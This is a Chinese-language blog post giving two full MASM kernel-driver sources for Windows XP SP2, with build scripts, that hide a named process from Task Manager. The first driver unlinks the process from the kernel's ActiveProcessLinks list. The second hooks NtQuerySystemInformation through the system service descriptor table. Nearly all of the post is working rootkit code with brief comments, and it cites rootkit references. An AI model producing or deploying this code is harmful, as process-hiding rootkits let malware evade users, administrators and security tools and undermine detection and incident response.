进程隐藏的两种方法
作者:dge
进程隐藏的两种方法
这两种都是很古老的方法,因为无聊,所以写了一下。代码在XP_SP2下调试通过.
(1).从活动进程链表(ActiveProcessLinks)中摘除自身,这种方法可以欺骗任务管理器,
下面这个程序做的就是双向链表的删除节点和插入节点,十分的简单。
;@echo off
;goto make
;----------------------------------------------------------------------------------------------------
.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; I N C L U D E F I L E S
;----------------------------------------------------------------------------------------------------
include d:/masm32/include/w2k/ntstatus.inc
include d:/masm32/include/w2k/ntddk.inc
include d:/masm32/include/w2k/ntoskrnl.inc
include d:/masm32/include/w2k/w2kundoc.inc
includelib d:/masm32/lib/w2k/ntoskrnl.lib
include d:/masm32/Macros/Strings.mac
_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP
;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "//Device//devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "//??//slHideprocess", g_usSymbolicLinkName, 4
.data
szHide db 'explorer.exe',0
Flink dd ?
Blink dd ?
Explorer dd ?
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------
.code
DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
local dwId,lpEprocess
local ListOffset,NameOffset
local IdOffset
local Version
; int 3
; invoke DbgPrint,$CTA0("/n/nEntry DriverEntry/n/n")
mov status,STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject
.if eax==STATUS_SUCCESS
mov eax,pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset _DriverUnload
assume eax:nothing
;获得得系统版本
invoke PsGetVersion,NULL,addr Version,NULL,NULL
mov eax,Version
cmp eax,0
jne l1
mov ListOffset,0A0h
mov NameOffset,1fch
jmp l2
l1: cmp eax,1
jne exit
mov ListOffset,88h
mov NameOffset,174h
l2: invoke PsGetCurrentProcessId
mov dwId,eax
invoke PsLookupProcessByProcessId,dwId,addr lpEprocess
mov esi,lpEprocess
add esi,ListOffset
mov edi,esi
assume edi:PLIST_ENTRY
assume esi:PLIST_ENTRY
l3: mov edx,[esi].Flink
;比较是否为最后一个EPROCESS
cmp edx,edi
je l4
assume esi:nothing
sub esi,ListOffset
add esi,NameOffset
invoke strcmp,esi,addr szHide
.if eax == 0
sub esi,NameOffset
add esi,ListOffset
mov Explorer,esi
assume esi:PLIST_ENTRY
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;删除节点
mov eax,[esi].Flink
mov ebx,[esi].Blink
mov [ebx].Flink,eax
mov [eax].Blink,ebx
mov Flink,eax
mov Blink,ebx
assume eax:nothing
assume ebx:nothing
invoke DbgPrint,$CTA0("/n/n************hide process successful ***********/n/n")
jmp l4
.endif
;恢复EPROCESS指针
sub esi,NameOffset
add esi,ListOffset
assume esi:PLIST_ENTRY
mov esi,[esi].Flink
jmp l3
l4:
assume esi:nothing
assume edi:nothing
mov status,STATUS_SUCCESS
exit:
.endif
mov eax,status
ret
mov eax,STATUS_DEVICE_CONFIGURATION_ERROR
ret
DriverEntry endp
;----------------------------------------------------------------------------------------------------
; D R I V E R U N L O A D
;----------------------------------------------------------------------------------------------------
_DriverUnload proc pDriverObject:PDRIVER_OBJECT
; int 3
; invoke DbgPrint,$CTA0("/n/nEntry DriverUnload/n/n")
pushad
mov eax,Flink
mov ebx,Explorer
assume ebx:PLIST_ENTRY
assume eax:PLIST_ENTRY
;恢复被摘除的节点
mov [eax].Blink,ebx
mov [ebx].Flink,eax
mov eax,Blink
mov [eax].Flink,ebx
mov [ebx].Blink,eax
popad
;清除符号连接
invoke IoDeleteSymbolicLink,addr g_usSymbolicLinkName
mov eax, pDriverObject
;删除在初始化创建的设备
invoke IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject
ret
_DriverUnload endp
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------
end DriverEntry
:make
set path=%path%;d:/masm32/bin
set drv=hideprocess
ml /nologo /c /coff %drv%.bat
link /nologo /driver /base:0x10000 /align:32 /out:%drv%.sys /subsystem:native %drv%.obj
del %drv%.obj
echo.
pause
;****************************************************************************************************
(2).如果你反汇编taskmgr.exe,可以在发现taskmgr.exe是通过NtQuerySystemInformation枚举进程的,
因此可以通过挂钩系统服务NtQuerySystemInformation修改这个函数的行为,从而实现在任务管理器中隐藏进程的目的,下面就是实现代码。
;@echo off
;goto make
.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; I N C L U D E F I L E S
;----------------------------------------------------------------------------------------------------
include d:/masm32/include/w2k/ntstatus.inc
include d:/masm32/include/w2k/ntddk.inc
include d:/masm32/include/w2k/native.inc
include d:/masm32/include/w2k/ntoskrnl.inc
includelib d:/masm32/lib/w2k/ntoskrnl.lib
include d:/masm32/Macros/Strings.mac
;----------------------------------------------------------------------------------------------------
; D A T A
;----------------------------------------------------------------------------------------------------
.data
;保存地址
dwOldNtQuerySystemInformation dd ?
dwAddr dd ?
;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "//Device//devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "//??//slHideprocess", g_usSymbolicLinkName, 4
CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------
.code
NewNtQuerySystemInformation proc SysInfoClass,lpSysInfo,SysInfoL,Return
invoke NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return
pushad
test eax,eax
jnz exit
.if SysInfoClass == SystemProcessesAndThreadsInformation
mov esi,lpSysInfo
mov ebx,esi
add esi,[esi]
@@: add esi,38h ;在38h偏移处取得进程名字。
invoke RtlCompareUnicodeString,addr processname, esi, 1
.if eax== 0
invoke DbgPrint, $CTA0("/nsuccessful /n")
.if dword ptr[esi-38h] == 0
mov dword ptr[ebx],0
jmp exit
.else
sub esi,38h
mov edx,[esi]
add [ebx],edx
add esi,[esi]
jmp @B
.endif
.else
sub esi,38h
cmp dword ptr[esi],0
jz exit
mov ebx,esi
add esi,[esi]
jmp @B
.endif
.endif
exit: popad
ret
NewNtQuerySystemInformation endp
;----------------------------------------------------------------------------------------------------
; H O O K F U N C
;----------------------------------------------------------------------------------------------------
HookFunction proc
pushad
; int 3
; invoke DbgPrint, $CTA0("/nEntry into hoookfunction/n")
;下面是用KeServiceDescriptorTabled导出符号获得数组的基地址,这个数组中包含有NtXXXX函数的入口地址。
mov eax, [KeServiceDescriptorTable]
mov esi, [eax]
mov esi, [esi]
;下面五句为获取ZwQuerySystemInformation的地址
mov eax,ZwQuerySystemInformation
inc eax
inc eax
mov eax,[eax]
mov eax,[eax]
inc eax
movzx ecx,byte ptr[eax]
sal ecx,2
add esi,ecx
mov dwAddr,esi
mov edi,dword ptr[esi]
;保存旧的函数地址。
mov dwOldNtQuerySystemInformation,edi
mov edi,offset NewNtQuerySystemInformation
;修改入口地址
cli
mov dword ptr[esi],edi
sti
popad
mov eax, STATUS_SUCCESS
ret
HookFunction endp
;----------------------------------------------------------------------------------------------------
; DriverUnload
;----------------------------------------------------------------------------------------------------
DriverUnload proc pDriverObject:PDRIVER_OBJECT
;必须保存环境,否则后果很严重。在这个函数中恢复被修改的地址。
pushad
; int 3
; invoke DbgPrint, $CTA0("/nEntry into DriverUnload /n")
mov esi,dwAddr
mov eax,dwOldNtQuerySystemInformation
cli
mov dword ptr[esi],eax
sti
invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
mov eax,pDriverObject
invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
popad
ret
DriverUnload endp
;----------------------------------------------------------------------------------------------------
; D R I V E R E N T R Y
;----------------------------------------------------------------------------------------------------
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PDEVICE_OBJECT
; int 3
; invoke DbgPrint, $CTA0("/nEntry into DriverEntry/n")
mov status, STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, addr pDeviceObject
.if eax == STATUS_SUCCESS
mov eax, pDriverObject
assume eax:ptr DRIVER_OBJECT
mov [eax].DriverUnload, offset DriverUnload
assume eax:nothing
invoke HookFunction
mov status, STATUS_SUCCESS
.endif
mov eax, status
ret
DriverEntry endp
end DriverEntry
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------
:make
set drv=hideprocess
d:/masm32/bin/ml /nologo /c /coff %drv%.bat
d:/masm32/bin/link /nologo /driver /base:0x10000 /align:32 /out:%drv%.sys /subsystem:native %drv%.obj
del %drv%.obj
echo.
pause
参考:
(1) Windows2000 内核级进程隐藏、侦测技术
(2) A portable Win32 userland rootkit
286
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
